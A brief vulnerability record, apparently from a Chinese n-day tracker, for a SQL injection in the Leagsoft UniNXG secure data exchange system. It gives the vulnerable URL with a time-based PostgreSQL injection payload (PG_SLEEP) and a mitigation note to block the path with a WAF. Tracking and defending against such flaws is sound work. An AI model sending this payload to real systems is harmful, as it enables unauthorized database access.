vendor = "联软"
name = "联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29--"
detail = "/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29--"
fix = "WAF封禁路径，等待发布补丁"
date = "0724"
label = "nday"
